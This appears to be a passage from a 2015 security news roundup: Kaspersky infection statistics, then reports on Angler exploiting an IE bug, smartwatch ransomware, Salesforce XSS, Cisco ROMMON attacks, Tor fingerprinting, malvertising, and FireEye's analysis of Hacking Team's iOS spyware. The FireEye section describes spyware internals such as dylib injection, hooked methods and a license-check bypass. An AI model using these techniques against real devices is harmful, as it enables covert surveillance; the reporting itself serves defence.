14 Kazakhstan 54.23%
15 Syria 53.00%
16 Tunisia 53.75%
17 Ethiopia 53.44%
18 Ruanda 53.17%
19 Ukraine 53.01%
20 Cambodia 52.88%
These statistics are based on the detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.

* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
** The percentage of unique users in the country with computers that blocked local threats as a percentage of all unique users of Kaspersky Lab products.

In Q2 2015, Bangladesh (60.53%) took the lead as the country with the highest level of computer infection, pushing down Vietnam which has headed the rating for almost two years. Pakistan (58.79%) rocketed from 13th position in the previous quarter to 3rd place in Q2.

The newcomers in the rankings were Georgia (5th position with 57.8%), Russia (11th position with 55%), Tunisia (16th position with 53.7%) and Ukraine (19th position with 53%).

An average of 40% of computers globally faced at least 1 local threat during Q2 2015 #KLReport
The safest countries in terms of local infection risks were Sweden (19.7%), Denmark (18.4%) and Japan (15.5%).

IT threat evolution Q2 2015

An average of 40% of computers globally faced at least one local threat during Q2 2015, which is 0.2% percentage points more than in Q1 2015.

Angler EK exploits recently patched IE bug to deliver ransomware
14.8.2015
If they haven't already, Internet Explorer users would do well to implement the security update provided by Microsoft last month, as among the fixed vulnerability is one that is currently being exploited via the popular commercial Angler exploit kit.

The existence of the vulnerability in question (CVE-2015-2419) has been discovered when the attackers who breached Hacking Team leaked the stolen data.

An email in the leaked trove showed that an external researcher attempted to sell a proof-of-concept exploit for the bug to the company. Details in the email allowed Vectra researchers to find the bug and analyze it.

FireEye researchers were the ones who have sounded the alarm about the exploit being added to Angler, along with a new obfuscation technique for it.

"The landing page fetches a stub of keys and data necessary to run the exploit from the server each time it executes. The stub of information is only sent to victims that broadcast vulnerable browsers, and is protected with XTEA over a homebrew Diffie-Hellman," they explained.

At the moment, Angler exploit kit is using the IE exploit to fling Cryptowall ransomware at unsuspecting victims. It can do so successfully because the vulnerability allows the attacker to gain the same user rights as the current user.

"If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft explained.

FireEye researcher's findings have been confirmed by malware researcher Kafeine.

"The exploitation of CVE-2015-2419 marks the second departure from Flash exploits for Angler (the first being the inclusion of CVE-2015-1671 in Silverlight)," the researchers commented. "This may be the result of Adobe’s recent exploit mitigations in Flash Player that prevent attackers from using Vector (and similar) objects to develop their control over corrupted Flash processes."

Ransomware Attacks Threaten Wearable Devices and Internet of Things

14.8.2015

Are you a proud owner of a Smartwatch, a Smart TV, a Smart fridge, a Smart lock, an Internet-enabled car, or live in a smart city?
Caution!
Recently, it has been reported that the growth of the Internet of Things would eventually lead to cyber criminals in making lots of money, as they started attacking the Internet of Things for Ransom.Yes, the latest Interest of the cyber criminals in the field of Internet of Things is ‘Ransomware’.
Internet of Things (IoT) such as Android and iOS-based wearable Smartwatches and the concept of connected homes has now given a treat to the current generation Ransomware.With the advancements in Technology, cyber criminals are simultaneously promoting themselves from the threat known for restricting computers or encrypting files and asking users for money in return for gaining back access to their systems.
From computers to mobile phones, now criminals are targeting the IoT and the wearables devices.Security researchers at Symantec demonstrated how an Android Wear device might be impacted by typical Android ransomware.In order to conduct this test, the researchers simply repackaged a current Android ransomware app (.apk file) – dubbed “Android.Simplocker”, inside a new Android Wear project.
Next, they took a Moto 360 Smartwatch and paired it with an Android phone. When they installed the new .apk file on the phone, they found that the phone became infected with the ransomware.
As the Smartwatch and an Android phone are required to be paired via Bluetooth for wireless connectivity, the ransomware also got pushed onto the smartwatch once the pairing of both the devices were done.
Once installed on the smartwatch, the malware could be easily activated by the user if they were tricked into running it, by clicking on a malicious app.
After installation, the ransomware will cause the smartwatch to become unresponsive and unusable!
Simplocker Android ransomware then checks for the display of the ransom message every second, and if it is not shown, will push it onto the screen again.In addition, Simplocker encrypts a range of different files stored on the smartwatch’s SD card.
Now, you must be thinking of escaping from the situation?You can recover from this situation, but unfortunately, it involves a factory reset of your smartwatch.But there also stands a condition where the rebooting of the device through hardware buttons is possible, then quickly navigating to the factory reset setting (within 20-30 seconds) before the ransomware is rebooted.
According to Symantec, while this would erase all files on the smartwatch, those files would have been encrypted by the malware in the first place.
For this one needs to keep an updated backup.
smart-tv-ransomwareNo such ransomware has been seen yet, but the day is not far when this becomes a reality.
As, in the past it was evident how smart Televisions got attacked with the ransomware also IoT devices being remotely controlled by the attacker.
Therefore, the crux is that the users need to be more vigilant and even smarter than the technology they are dependent on.

Salesforce Patches XSS on a Subdomain

14.8.2015

Salesforce.com has patched a vulnerability on one of its subdomains that exposed users to account takeover, phishing attacks and the installation of malicious code. The vulnerability was disclosed yesterday by researcher Aditya K. Sood of Elastica Cloud Threat Labs. Sood said admin.salesforce.com was vulnerable to a cross-site scripting attack that has since been patched after it was reported more than a month ago. Salesforce, Sood wrote in a blogpost, said the vulnerability posed less of a risk because it was present in a Salesforce subdomain. “The vulnerability was not present in ‘login.salesforce.com,’ but in another subdomain of Salesforce. However, since the primary domain is ‘salesforce.com,’ this trust can be exploited through phishing attacks by tricking users into providing their legitimate credentials,” Sood said. Sood said that Salesforce accounts for its applications use SSO for authentication, extending the threat even to accounts used with cloud-based applications. “This subdomain was vulnerable to a reflected cross-site scripting (XSS) vulnerability where a specific function in the deployed application failed to sanitize and filter the arbitrary input passed by the remote user as a part of an HTTP request,” Sood said. “As a result, the attacker could have executed JavaScript in the context of the application, thereby impacting the privacy and security of Salesforce users.” To carry out a phishing attack, a hacker would need to create a popup mimicking the Salesforce login and remotely inject the JavaScript. From there, the victim would enter their legitimate Salesforce credentials that are then sent to the attacker’s web server. Cross-site scripting attacks (XSS) happen when malicious script is injected into a Website or Web-based application, and is a perennial web application security issue on the OWASP Top 10 list. Generally, an attacker will inject malicious script into GET request or it’s included in dynamic content. Usually XSS is enabled because a Web app fails to validate the input.

OpenSSH 7.0 Fixes Four Flaws

13.8.2015

A new version of OpenSSH has been released, fixing four security vulnerabilities and a number of non-security related bugs. OpenSSH 7.0 includes patches for a use-after-free vulnerability and three other flaws, two of which only affect Portable OpenSSH. The maintainers of the software also gave users notice that the next version of the software would deprecate several old ciphersuites and cryptographic algorithms that are no longer considered safe. One of the vulnerabilities patched in version 7.0 is an issue with the way OpenSSH handles some authentication requests. “By specifying a long, repeating keyboard-interactive “devices” string, an attacker could request the same authentication method be tried thousands of times in a single pass. The LoginGraceTime timeout in sshd(8) and any authentication failure delays implemented by the authentication mechanism itself were still applied,” the release notes say. One of the bugs that affects only Portable OpenSSH is a use-after-free that could lead to remote code execution. “Fixed a use-after-free bug related to PAM support that was reachable by attackers who could compromise the pre-authentication process for remote code execution,” the advisory says. The second vulnerability in Portable OpenSSH also could lead to remote code execution. “Fixed a privilege separation weakness related to PAM support. Attackers who could successfully compromise the pre-authentication process for remote code execution and who had valid credentials on the host could impersonate other users,” the advisory says. In OpenSSH 7.1, the maintainers plan to remove a number of problematic cryptographic algorithms and ciphers. Among the changes to be made are: * Refusing all RSA keys smaller than 1024 bits (the current minimum is 768 bits) * Several ciphers will be disabled by default: blowfish-cbc, cast128-cbc, all arcfour variants and the rijndael-cbc aliases for AES. * MD5-based HMAC algorithms will be disabled by default. In the just-released version 7.0, there are a number of cryptographic changes, as well. The software disables 1024-bit diffie-hellman-group1-sha1 key exchange by default and also drops support for the old SSH version 1 protocol.

Facebook Awards $100,000 for New Class of Vulnerabilities and Detection Tool

13.8.2015

Facebook tonight awarded a $100,000 prize to a team of Georgia Tech researchers who found a new class of browser-based memory-corruption vulnerabilities and built a corresponding detection technique. The award brings the social media giant on par with Microsoft and its six-figure payouts for mitigation bypasses and new defensive techniques for those bypasses. The award, Facebook’s Internet Defense Prize, was handed out at the USENIX Security Symposium in Washington, D.C., and doubles last year’s inaugural payout of $50,000. The prize is an effort to recognize and fund Internet security research in the areas of defense and protection, Facebook said. Security research in general celebrates offensive research and less attention is paid to people doing the nitty-gritty work required to keep systems safe and whole classes of vulnerabilities less likely to occur,” said Facebook security engineering manager Ioannis Papagiannis. “We look at work targeting meaningful bugs affecting a lot of people on the Internet.” Georgia Tech Ph.D. students Byoungyoung Lee and Chengyu Song, and professors Taesoo Kim and Wenke Lee are this year’s winners. Their paper, “Type Casting Verification: Stopping an Emerging Attack Vector,” explains a newly discovered class of C++ vulnerabilities and introduces CaVeR, a runtime bad-casting detection tool. “It performs program instrumentation at compile time and uses a new runtime type tracing mechanism—the type hierarchy table—to overcome the limitation of existing approaches and efficiently verify type casting dynamically,” the researchers wrote in describing CaVeR. Papagiannis said Facebook hopes the reward money incentivizes the researchers to continue working CaVeR and make it accessible and reusable on a greater scale. “They are targeting a real-world security problem that has been used to attack high-profile vulnerabilities,” he said, pointing to a 2013 Chrome type confusion exploit. “This addresses an important problem.” Type casting, the researchers said, is important in enabling polymorphism in C++ programming in particular. “However, if not correctly used, it may return unsafe and incorrectly casted values, leading to so-called bad-casting or type-confusion vulnerabilities,” the researchers wrote. “Since a bad-casted pointer violates a programmer’s intended pointer semantics and enables an attacker to corrupt memory, bad-casting has critical security implications similar to those of other memory corruption vulnerabilities. Despite the increasing number of bad-casting vulnerabilities, the bad-casting detection problem has not been addressed by the security community.” Facebook’s Papagiannis said in a statement that C++ supports static and dynamic casts; static casts are preferred for performance reasons. “People typically prefer to use static casts because they avoid that overhead, but if you cast to the wrong type using a static cast, the program may end up creating a pointer that can point past the memory allocated to a particular object,” Papagiannis said. “That pointer can then be used to corrupt the memory of the process.” CaVeR has already paid dividends for the security community; with it, the researchers found two bad casts in Firefox and another nine in libstdc++, the GNU standard C++ library used in the Chrome browser; the vulnerabilities have since been patched. Last year, Facebook paid $50,000 to Johannes Dahse and Thorsten Holz of Ruhr University in Bochum, Germany for their paper, “Static Detection of Second-Order Vulnerabilities in Web Applications.” Papagiannis said Facebook will meet Dahse and Holz a month from now in London to assess the progress they’ve made on their defensive tool and whether Facebook would consider using it internally. Papagiannis points out that Facebook makes no claims on any of the research and encourages teams to share their work with the greater community outside of academia. Payouts of that size have been rare from reward programs. Microsoft’s defense prize, known as the Blue Hat Prize, paid out $200,000 in the summer of 2012 to a Columbia University PhD candidate for his ROP mitigation technology. It has also paid out six-figure prizes to researchers for mitigation bypasses, the most recent being a $125,000 award to HP’s Zero Day Initiative team for new vulnerabilities that enable ASLR bypass; Microsoft said it would not patch the bugs because they did not affect enough users, prompting HP in June to disclose full details and proof of concept code. The mitigation bypass bounty was launched in June 2013 and featured a $100,000 prize for exploit techniques that bypass Windows mitigations such as DEP, ASLR, SEHOP and others.

Cisco Warns Customers About Attacks Installing Malicious IOS Bootstrap Images

12.8.2015

Cisco is warning enterprise customers about a spike in attacks in which hackers use valid credentials on IOS devices to log in as administrators and then upload malicious ROMMON images to take control of the devices. The ROM Monitor is the program that initializes the hardware and software on IOS devices, and an attacker who is able to install a modified, malicious image would have persistent access to the compromised device. Cisco’s security team has been contacting customers to warn them about the attacks, which are ongoing. A key component of the attacks is that the attacker needs to have valid administrator-level credentials in order to access the device. There is no underlying vulnerability that the attackers are exploiting. They are somehow harvesting admin credentials and then using them to install the malicious ROMMON images. “Cisco PSIRT has contacted customers to describe an evolution in attacks against Cisco IOS Classic platforms. Cisco has observed a limited number of cases where attackers, after gaining administrative or physical access to a Cisco IOS device, replaced the Cisco IOS ROMMON (IOS bootstrap) with a malicious ROMMON image,” the advisory from Cisco says. “In all cases seen by Cisco, attackers accessed the devices using valid administrative credentials and then used the ROMMON field upgrade process to install a malicious ROMMON. Once the malicious ROMMON was installed and the IOS device was rebooted, the attacker was able to manipulate device behavior. Utilizing a malicious ROMMON provides attackers an additional advantage because infection will persist through a reboot.” The ability to install new ROMMON images on IOS devices is an expected capability for users with admin privileges. Cisco says that there is no plan to issue a CVE related to these attacks, because of the lack of a vulnerability.

Hack-Fueled ‘Unprecedented’ Insider Trading Ring Nets $100M

12.8.2015

Hackers based in Ukraine and Russia allegedly broke into servers belonging to several newswires and passed sensitive information onto an underground trading ring as part of what’s being referred to as an unprecedented new level of insider trading. Prosecutors claimed Tuesday that corporate information gleaned in the hacks was funneled to a sophisticated insider trading ring that earned those involved nearly $100 million. In a press conference Tuesday morning Mary Jo White, the Chairwoman of the U.S. Securities and Exchange Commission, maintained that given the number of hackers, traders, and profit involved, the case is “unprecedented.” Prosecutors with the U.S. Attorney’s office in New Jersey initially announced the indictment of nine people, five of whom were arrested in Georgia and Pennsylvania, Tuesday morning. A follow-up announcement in Newark revealed that 32 people connected to the scheme in total were facing charges. According to Reuters, it’s the first time that prosecutors have brought criminal charges against individuals for perpetrating a securities fraud scheme involving hacked insider information. The hackers purportedly infiltrated servers belonging to press release agencies: PRNewswire Association, Marketwire, and the Berkshire Hathaway subsidiary Business Wire, first accessing the newswires’ networks as early as 2010. Once they were in, over the course of five years, the hackers passed along sensitive information – some of which pertained to large Fortune 500 companies – to traders, who then used it to their benefit. A related SEC complaint filed in tandem with the indictments notes that civil charges are being brought against 32 individuals and claims the hackers used “malicious programming code and other deceptive techniques to hack into the computer systems.” According to a 57 page long indictment filed in the U.S. District Court of New Jersey, five men were charged, including hackers Ivan Turchynov and Oleksandr Ieremenko, and traders Arkadiy Dubovoy, Igor Dubovoy, and Pavel Dubovoy. In a separate indictment filed in a New York federal court in Brooklyn, prosecutors charged four additional traders: Vitaly Korchevsky of Pennsylvania; Vladislav Khalupsky of Brooklyn and Odessa, Ukraine, and Leonid Momotok and Alexander Garkusha of Georgia. The traders used the information, which wasn’t yet public, to buy and sell shares. More than 150,000 press releases, some involving international, high profile companies like Viacom, Netflix, Home Depot, Hewlett-Packard, Boeing, and Oracle, were shared amongst the group. Once the traders received press releases regarding companies, they did business quickly. “In order to execute their trades before the Stolen Releases were made public, the Trader Defendants and other co-conspirators sometimes executed trades in very short windows of time between when the Hacker Defendants illegally access and shared the Stolen Releases and when the press releases were disseminated to the public by Victim Newswires,” reads one part of the New Jersey-based indictment. Hackers leveraged stolen credentials and used a series of reverse shells, brute force attacks, and SQL injection attacks to penetrate the agencies’ networks, according to the indictments. The indictment filed in New Jersey initially claimed the conspiracy netted those involved over $30 million in “illicit trading profits” but those figures were later upped to $100 million in a press conference Tuesday morning led by White and Homeland Security Secretary’s Jeh Johnson.

10.8.2015

Certifi-Gate Android Vulnerability
Android users are busy fighting with Stagefright vulnerability while the popular mobile operating system faces another critical security vulnerability, dubbed as “Certifi-Gate”.
Millions of Android devices could be hacked exploiting a plugin that comes pre-installed on your Android devices by the manufacturers.
Most of the Android device manufacturers pre-install ‘Remote Support Tool (mRST)’ plugin onto their phones that are intended to help users, such as RSupport or TeamViewer.
But, a critical Certifi-Gate security vulnerability in this mRTS plugin allows malicious applications to gain illegitimate privileged access rights, even if your device is not rooted.
"Certifi-Gate" Android security vulnerability
According to Israeli researchers at Check Point, Ohad Bobrov and Avi Bashan, Certifi-Gate Android vulnerability lies in the way Google’s partners (manufacturers) use certificates to sign remote support tools.
Remote support tools often have root level access to Android devices, even if your device is not rooted. Thus any installed app can use Certifi-Gate vulnerability to gain unrestricted device access, including:
screen scraping
keylogging
exfiltrating private information
installing malware apps, and more
The flaw affects thousands of millions of Android devices, and users cannot uninstall the vulnerable plugin from the device because it is part of the core system…
...Ironic, huh?
“An attacker can exploit mRATs to exfiltrate sensitive information from devices such as location, contacts, photos, screen capture, and even recordings of nearby sounds.” Researchers explained in the published paper.
“While analyzing and classifying mRATs, our research team found some apps share common traits with mRST. Known mRAT players include HackingTeam, mSpy, and SpyBubble.”

Shoring up Tor

10.8.2015
Researchers mount successful attacks against popular anonymity network — and show how to prevent them.

With 2.5 million daily users, the Tor network is the world’s most popular system for protecting Internet users’ anonymity. For more than a decade, people living under repressive regimes have used Tor to conceal their Web-browsing habits from electronic surveillance, and websites hosting content that’s been deemed subversive have used it to hide the locations of their servers.
Researchers at MIT and the Qatar Computing Research Institute (QCRI) have now demonstrated a vulnerability in Tor’s design. At the Usenix Security Symposium this summer, they will show that an adversary could infer a hidden server’s location, or the source of the information reaching a given Tor user, by analyzing the traffic patterns of encrypted data passing through a single computer in the all-volunteer Tor network.
Fortunately, the same paper also proposes defenses, which representatives of the Tor project say they are evaluating for possible inclusion in future versions of the Tor software.
“Anonymity is considered a big part of freedom of speech now,” says Albert Kwon, an MIT graduate student in electrical engineering and computer science and one of the paper’s first authors. “The Internet Engineering Task Force is trying to develop a human-rights standard for the Internet, and as part of their definition of freedom of expression, they include anonymity. If you’re fully anonymous, you can say what you want about an authoritarian government without facing persecution.”
Layer upon layer
Sitting atop the ordinary Internet, the Tor network consists of Internet-connected computers on which users have installed the Tor software. If a Tor user wants to, say, anonymously view the front page of The New York Times, his or her computer will wrap a Web request in several layers of encryption and send it to another Tor-enabled computer, which is selected at random. That computer — known as the guard — will peel off the first layer of encryption and forward the request to another randomly selected computer in the network. That computer peels off the next layer of encryption, and so on.
The last computer in the chain, called the exit, peels off the final layer of encryption, exposing the request’s true destination: the Times. The guard knows the Internet address of the sender, and the exit knows the Internet address of the destination site, but no computer in the chain knows both. This routing scheme, with its successive layers of encryption, is known as onion routing, and it gives the network its name: “Tor” is an acronym for “the onion router.”
In addition to anonymous Internet browsing, however, Tor also offers what it calls hidden services. A hidden service protects the anonymity of not just the browser, but the destination site, too. Say, for instance, that someone in Iran wishes to host a site archiving news reports from Western media but doesn’t want it on the public Internet. Using the Tor software, the host’s computer identifies Tor routers that it will use as “introduction points” for anyone wishing to access its content. It broadcasts the addresses of those introduction points to the network, without revealing its own location.
If another Tor user wants to browse the hidden site, both his or her computer and the host’s computer build Tor-secured links to the introduction point, creating what the Tor project calls a “circuit.” Using the circuit, the browser and host identify yet another router in the Tor network, known as a rendezvous point, and build a second circuit through it. The location of the rendezvous point, unlike that of the introduction point, is kept private.
Traffic fingerprinting
Kwon devised an attack on this system with joint first author Mashael AlSabah, an assistant professor of computer science at Qatar University, a researcher at QCRI, and, this year, a visiting scientist at MIT; Srini Devadas, the Edwin Sibley Webster Professor in MIT’s Department of Electrical Engineering and Computer Science; David Lazar, another graduate student in electrical engineering and computer science; and QCRI’s Marc Dacier.
The researchers’ attack requires that the adversary’s computer serve as the guard on a Tor circuit. Since guards are selected at random, if an adversary connects enough computers to the Tor network, the odds are high that, at least on some occasions, one or another of them would be well-positioned to snoop.
During the establishment of a circuit, computers on the Tor network have to pass a lot of data back and forth. The researchers showed that simply by looking for patterns in the number of packets passing in each direction through a guard, machine-learning algorithms could, with 99 percent accuracy, determine whether the circuit was an ordinary Web-browsing circuit, an introduction-point circuit, or a rendezvous-point circuit. Breaking Tor’s encryption wasn’t necessary.
Furthermore, by using a Tor-enabled computer to connect to a range of different hidden services, they showed that a similar analysis of traffic patterns could identify those services with 88 percent accuracy. That means that an adversary who lucked into the position of guard for a computer hosting a hidden service, could, with 88 percent certainty, identify it as the service’s host.
Similarly, a spy who lucked into the position of guard for a user could, with 88 percent accuracy, tell which sites the user was accessing.
To defend against this type of attack, “We recommend that they mask the sequences so that all the sequences look the same,” AlSabah says. “You send dummy packets to make all five types of circuits look similar.”
“For a while, we’ve been aware that circuit fingerprinting is a big issue for hidden services,” says David Goulet, a developer with the Tor project. “This paper showed that it’s possible to do it passively — but it still requires an attacker to have a foot in the network and to gather data for a certain period of time.”
“We are considering their countermeasures as a potential improvement to the hidden service,” he adds. “But I think we need more concrete proof that it definitely fixes the issue.”

Malvertisers abused Yahoo’s ad network for days
8.8.2015
A large-scale malvertising attack abusing Yahoo’s ad network has been hitting visitors of the Internet giant's many popular and heavy-traffic sites for nearly a week.

Started on July 28th, the campaign showed malicious ads that would redirect visitors to a site hosting the Angler exploit kit, which would then attempt to exploit an Adobe Flash vulnerability on the victims' computer.

The attack was spotted by Malwarebytes' researchers, who immediately notified Yahoo, and the company put a stop to it.

"As soon as we learned of this issue, our team took action and will continue to investigate this issue," Yahoo noted.

"Unfortunately, disruptive ad behavior affects the entire tech industry. Yahoo has a long history of engagement on this issue and is committed to working with our peers to create a secure advertising experience. We’ll continue to ensure the quality and safety of our ads through our automated testing and through the SafeFrame working group, which seeks to protect consumers and publishers from the potential security risks inherent in the online ad ecosystem.”

Malwarebytes' researchers didn't manage to get the ultimate malicious payload delivered by the exploit kit, but Angler has lately been dropping a mix of ad fraud malware and ransomware. It's also unknown how many users have been victimized.

“This one is a doozey in terms of scale, because it uses Yahoo's properties, which see nearly 7 billion visits per month," commented Kowsik Guruswamy, CTO for Menlo Security.

"The method of the attack is nothing new: Bad actors place ads via Yahoo's network, and the ads direct users to sites that have been compromised and set up to serve malware."

This particular campaign has been stopped by Yahoo, but if you are still running Flash on your system, you should make sure to update it regularly. And if you have been lax in doing that, checking your computer for malware is a good idea.

"The inconvenient truth about the Web is that it's dangerous and it's not the kind of place you should go without effective protection. There's no way to stop cyber criminals from attacking, and there's no way to detect and stop all of their attacks. The only way to be safe is to execute *all* Web content away from your endpoint so it can't do harm even if it's malicious. That's what isolation security is all about, and it seems pretty clear that its time has come,” noted Guruswamy.

"The complexity of the online advertising economy makes it easy for malicious actors to abuse the system and get away with it. It is one of the reasons why we need to work very closely with different industry partners to detect suspicious patterns and react very quickly to halt rogue campaigns," added Malwarebytes' Jerome Segura.

Malicious advertisements surge! 260% spike in 2015
8.8.2015

RiskIQ announced at Black Hat USA 2015 its latest findings on the prevalence of malvertising across the nearly two billion publisher pages and 10 million mobile apps it monitors per day.

In the first half of this year the number of malvertisements has jumped 260 percent compared to the same period in 2014. The sheer number of unique malvertisements has climbed 60 percent year over year. Meanwhile, fake Flash updates have replaced fake antivirus and fake Java updates as the most commonly method used to lure victims into installing various forms of malware including ransomware, spyware and adware.

“The major increase we have seen in the number of malvertisements over the past 48 months confirms that digital ads have become the preferred method for distributing malware,” said James Pleger, Director of Research at RiskIQ. “There are a number of reasons for this development, including the fact that malvertisements are difficult detect and take down since they are delivered through ad networks and are not resident on websites. They also allow attackers to exploit the powerful profiling capabilities of these networks to precisely target specific populations of users.”

The rise of programmatic advertising, which relies on software instead of humans to purchase digital ads, has generated unprecedented growth and introduced sophisticated targeting into digital ad networks.

This machine-to-machine ecosystem has also created opportunities for cyber criminals to exploit display advertising to distribute malware. For example, malicious code can be hidden within an ad, executables can be embedded on a webpage, or bundled within software downloads.

RiskIQ’s global proxy network of virtual software users scans billions of websites and millions of mobile apps per day for the presence of malvertisements, malware and malicious/copycat apps.

The company’s most recent research into the prevalence of malvertisements yielded the following findings:
Malvertisements have increased 260 percent on a pro-rated basis in the first half of 2015 (450,000) compared to all of 2014 (250,000)
The number of unique malvertisements in June of 2015 (80,000) has jumped 60 percent in compared to the same period last year (50,000)
The most common lure used in malvertisements in 2015 has been fake Flash updates, in 2014 the top lures were fake antivirus updates and fake Java updates
In 2014, there was significantly more exploit kit activity (which silently installs malware without end user intervention) than fake software updates that require user consent
In 2015, fake software updates have surpassed exploit kits as the most common technique for installing malware.

iOS Masque Attack Weaponized: A Real World Look
7.8.2015

We previously have described the threats of Masque Attacks against iOS in a series of blogs [2,3,4]. Up until now, these attacks had never bee seen carried out in the wild, highlighting that advanced threats were not utilizing mobile to carry out their attacks despite rapid user adoption. However, FireEye has recently uncovered 11 iOS apps within the Hacking Team’s arsenals that utilize Masque Attacks, marking the first instance of targeted iOS malware being used against non-jailbroken iOS devices.

These apps are reverse engineered and weaponized versions of popular social networking and messaging apps, including: WhatsApp, Twitter, Facebook, Facebook Messenger, WeChat, Google Chrome, Viber, Blackberry Messenger, Skype, Telegram, and VK. Unlike the normal versions of these apps, they come with an extra binary designed to exfiltrate sensitive data and communicate with a remote server. Because all the bundle identifiers are the same as the genuine apps on App Store, they can directly replace the genuine apps on iOS devices prior 8.1.3.

Note that the bundle identifiers are actually configurable by the remote attackers. So for iOS devices above 8.1.3, although the Masque Attack vulnerability has been fixed (apps with the same bundle identifiers cannot replace each other), the attackers can still use a unique bundle identifier to deploy the weaponized app. In this scheme, the attack falls back to the Enpublic attack[1].

Fig 5. shows an example of the runtime behavior of the repackaged Facebook app. Upon launching the app, three consecutive alerts are popped up asking for permission of access the Photo, Microphone, and Contacts.

As shown in Fig. 6, those malicious Masque Attack apps leverage the LC_LOAD_DYLIB command of the MachO format to inject a malicious dylib (named “_PkgSign”) into the genuine executable file. This dylib implements the core malicious logic.

Since each Masque Attack app has different internals, the dylib needs to hook different methods for data exfiltration. As listed in Table 1, the malicious dylib maps each Masque Attack app an id prefixed by “TIGI000” and a customized class for managing the malicious behaviors controlled by the remote server.

APPID Malicious Manager Class Name Bundle ID of Masque Attack App
TIGI00001

POViewConnection

com.skype.skype

TIGI00002

POViewAsynService

com.viber

TIGI00003

POViewRegistration

net.whatsapp.WhatsApp

TIGI00004

_bvbcccyytr

com.facebook.Facebook

TIGI00006

POViewDataManager

com.facebook.Messenger

TIGI00008

POViewLogger

com.google.chrome.ios

TIGI00009

VKMessageManager

com.vk.vkclient

TIGI00010

TelegramManager

ph.telegra.Telegraph

TIGI00011

BBMManager

com.blackberry.bbm1

TIGI00012

WechatManager

com.tencent.xin

TIGI00013

TwitterManager

com.atebits.Tweetie2

...

...

...

Table 1: The mapping of handler class to the bundle id of each Masque Attack app

The injected dylib hooks 52 sensitive functions of 38 classes in the genuine executables. All of the hooked class methods correspond to key functionalities of the genuine apps. For example, hooking “[SKPConversation OnMessage:andMessageobjectid:]” to intercept messages in Whats App and “[VideoVoipCallerView OnBeginTalk:]” to start recording a outgoing voice call in Wechat App.

The injected dylib is acting as part of the apps executable file and can read/modify the all data in the app’s containers to gather sensitive information and send them to the remote server. The information includes:

Voice call recording in Skype, Wechat, etc.
Text message intercepting in Skype, Whats App, Facebook messenger, etc.
Chrome visited website history
Phone call
SMS/iMessage content
Precise GPS coordinate recording in background
Contacts information
Photos
Of special note, the dylib has the capability to upload data only from targeted users. It sends the IMEI to the remote server to check if the target device is of interest. The server will instruct whether to exfiltrate data or not. However, we have found logic to bypass the check if the SKIP-LICENSE key is set to 1 in the keychain. So local colludes can set this value to 1 to force data exfiltrating if they find the victim of value.

Finally, all data are reassembled in Json format and sent to the remote server.Fig. 8 shows an example of the uploaded data (actual values anonymized). The items field contains different types of data such as the chat data for the communication apps, geo location information, phone call history, etc.

Configurable via URL scheme

The remote server and malicious behaviors are configurable through URL. In each repackaged sample, we found a customized URL scheme is added to the Info.plist file. The URL schemes follow the pattern “TIGI0000X://”, which is exactly the same as APPID column listed in Table 1.

By hooking the “application:openURL:sourceApplication:annotation:” function, the malicious dylib can parse the configure data when the URL scheme is opened. The configure data is serialized in JSON format, encoded in Base64 and appended right after the customized URL scheme. The attacker can lure the targeted victims to click such URLs via SMS/Email/Web page on the device and customize targeted configurations such as the remote server.

Conclusion

From the attack tools leaked from the Hacking Team, we have now seen that advanced targeted attacks against iOS devices have begun to emerge. We encourage all iOS users to always update their devices to the latest version of iOS and pay close attention to the avenues that they download their apps.

References

[1] VB2014 paper: Apple without a shell – iOS under targeted attack

[2] iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking

[3] Masque Attack: All Your iOS Apps Belong to Us

[4] Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking